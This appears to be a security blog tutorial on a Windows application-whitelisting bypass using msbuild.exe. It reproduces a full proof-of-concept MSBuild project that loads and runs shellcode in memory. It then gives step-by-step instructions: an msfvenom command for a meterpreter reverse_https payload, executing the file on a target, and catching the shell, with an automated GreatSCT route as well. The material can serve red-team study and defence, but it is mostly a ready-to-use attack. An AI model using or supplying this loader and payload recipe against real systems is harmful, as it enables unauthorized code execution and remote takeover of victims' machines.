Application Whitelisting Bypass: msbuild.exe

Background

Casey Smith (@subTee) discovered a Microsoft binary called “msbuild.exe”. He wrote a blog on Tuesday, September 13, 2016 titled “Bypassing Application Whitelisting using MSBuild.exe – Device Guard Example and Mitigations”. His blog is no longer available, however, you can access it via archive.org here.

Proof of Concept

You can also download the proof of concept from here.

<Project ToolsVersion="4.0" xmlns="http://schemas.microsoft.com/developer/msbuild/2003">
 <!-- This inline task executes shellcode. -->
 <!-- C:\Windows\Microsoft.NET\Framework\v4.0.30319\msbuild.exe SimpleTasks.csproj -->
 <!-- Save This File And Execute The Above Command -->
 <!-- Author: Casey Smith, Twitter: @subTee -->
 <!-- License: BSD 3-Clause -->
 <Target Name="Hello">
 <ClassExample />
 </Target>
 <UsingTask
 TaskName="ClassExample"
 TaskFactory="CodeTaskFactory"
 AssemblyFile="C:\Windows\Microsoft.Net\Framework\v4.0.30319\Microsoft.Build.Tasks.v4.0.dll" >
 <Task>
 
 <Code Type="Class" Language="cs">
 <![CDATA[
 using System;
 using System.Runtime.InteropServices;
 using Microsoft.Build.Framework;
 using Microsoft.Build.Utilities;
 public class ClassExample : Task, ITask
 { 
 private static UInt32 MEM_COMMIT = 0x1000; 
 private static UInt32 PAGE_EXECUTE_READWRITE = 0x40; 
 [DllImport("kernel32")]
 private static extern UInt32 VirtualAlloc(UInt32 lpStartAddr,
 UInt32 size, UInt32 flAllocationType, UInt32 flProtect); 
 [DllImport("kernel32")]
 private static extern IntPtr CreateThread( 
 UInt32 lpThreadAttributes,
 UInt32 dwStackSize,
 UInt32 lpStartAddress,
 IntPtr param,
 UInt32 dwCreationFlags,
 ref UInt32 lpThreadId 
 );
 [DllImport("kernel32")]
 private static extern UInt32 WaitForSingleObject( 
 IntPtr hHandle,
 UInt32 dwMilliseconds
 ); 
 public override bool Execute()
 {
 byte[] shellcode = new byte[] { INSERT_SHELLCODE_HERE } };
 
 UInt32 funcAddr = VirtualAlloc(0, (UInt32)shellcode.Length,
 MEM_COMMIT, PAGE_EXECUTE_READWRITE);
 Marshal.Copy(shellcode, 0, (IntPtr)(funcAddr), shellcode.Length);
 IntPtr hThread = IntPtr.Zero;
 UInt32 threadId = 0;
 IntPtr pinfo = IntPtr.Zero;
 hThread = CreateThread(0, 0, funcAddr, pinfo, 0, ref threadId);
 WaitForSingleObject(hThread, 0xFFFFFFFF);
 return true;
 } 
 } 
 ]]>
 </Code>
 </Task>
 </UsingTask>
 </Project>

How it works

Here’s a direct quote from Casey’s blog post. It’s pretty simple, “msbuild.exe” will run C# code for you.

Turns out, MSBuild.exe has a built in capability called “Inline Tasks”.  These are snippets of C# code that can be used to enrich the C# build process.  
Essentially, what this does, is take an XML file, compile and execute in memory on the target, so it is not a traditional image/module execution event.

Tutorial

Manual

Download the proof of concept from here. Use metasploit to generate C# shellcode with the follow command: “msfvenom -a x86 –platform windows -p windows/meterpreter/reverse_https LHOST=192.168.1.1 LPORT=443 -f csharp”. Replace the value of LHOST with your own ip address. Replace “INSERT_SHELLCODE_HERE” in the template with the shellcode generated from Metasploit.

Start your metasploit listener in msfconsole. Copy your “msbuild.exe” xml file to the target system. In my case, this is Windows 10 Enterprise. Execute the payload with the following command: “C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe shellcode.xml”.

Process Hacker shows an established TCP connection to our ip address. Let’s check metasploit for our shell.

Automated

We’re going to use GreatSCT to generate a “msbuild.exe” payload.

  • git clone https://github.com/GreatSCT/GreatSCT.git
  • cd GreatSCT
  • python3 ./gr8sct.py

Press any key to begin.

Select option number “zero” (0) and press enter.

Configure any options as desired with “set”, i.e. “set 2 80” or “set ListenerPort 80”. Type “generate” and press enter.

Copy your payload to your target and follow the instructions to execute.

Process Hacker shows an established TCP connection to our ip address. Let’s check metasploit for our shell.

Credits


      

Leave a comment

Your email address will not be published. Required fields are marked *